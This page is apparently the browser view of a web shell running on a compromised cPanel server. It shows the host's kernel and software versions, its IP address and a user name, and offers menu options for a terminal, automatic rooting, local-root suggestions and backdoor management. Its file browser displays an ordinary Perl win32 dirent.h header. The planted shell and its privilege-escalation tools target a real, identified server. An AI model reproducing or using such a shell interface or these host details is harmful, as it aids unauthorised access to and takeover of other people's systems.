Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
win32 /
include /
Delete
Unzip
Name
Size
Permission
Date
Action
arpa
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
sys
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
dirent.h
1.22
KB
-r--r--r--
2014-12-27 11:49
netdb.h
150
B
-r--r--r--
2014-12-27 11:49
Save
Rename
/* dirent.h */ /* djl * Provide UNIX compatibility */ #ifndef _INC_DIRENT #define _INC_DIRENT /* * NT versions of readdir(), etc * From the MSDOS implementation */ /* Directory entry size */ #ifdef DIRSIZ #undef DIRSIZ #endif #define DIRSIZ(rp) (sizeof(struct direct)) /* needed to compile directory stuff */ #define DIRENT direct /* structure of a directory entry */ typedef struct direct { long d_ino; /* inode number (not used by MS-DOS) */ long d_namlen; /* name length */ char d_name[257]; /* file name */ } _DIRECT; /* structure for dir operations */ typedef struct _dir_struc { char *start; /* starting position */ char *curr; /* current position */ long size; /* allocated size of string table */ long nfiles; /* number of filenames in table */ struct direct dirstr; /* directory structure to return */ void* handle; /* system handle */ char *end; /* position after last filename */ } DIR; #if 0 /* these have moved to win32iop.h */ DIR * win32_opendir(const char *filename); struct direct * win32_readdir(DIR *dirp); long win32_telldir(DIR *dirp); void win32_seekdir(DIR *dirp,long loc); void win32_rewinddir(DIR *dirp); int win32_closedir(DIR *dirp); #endif #endif /* _INC_DIRENT */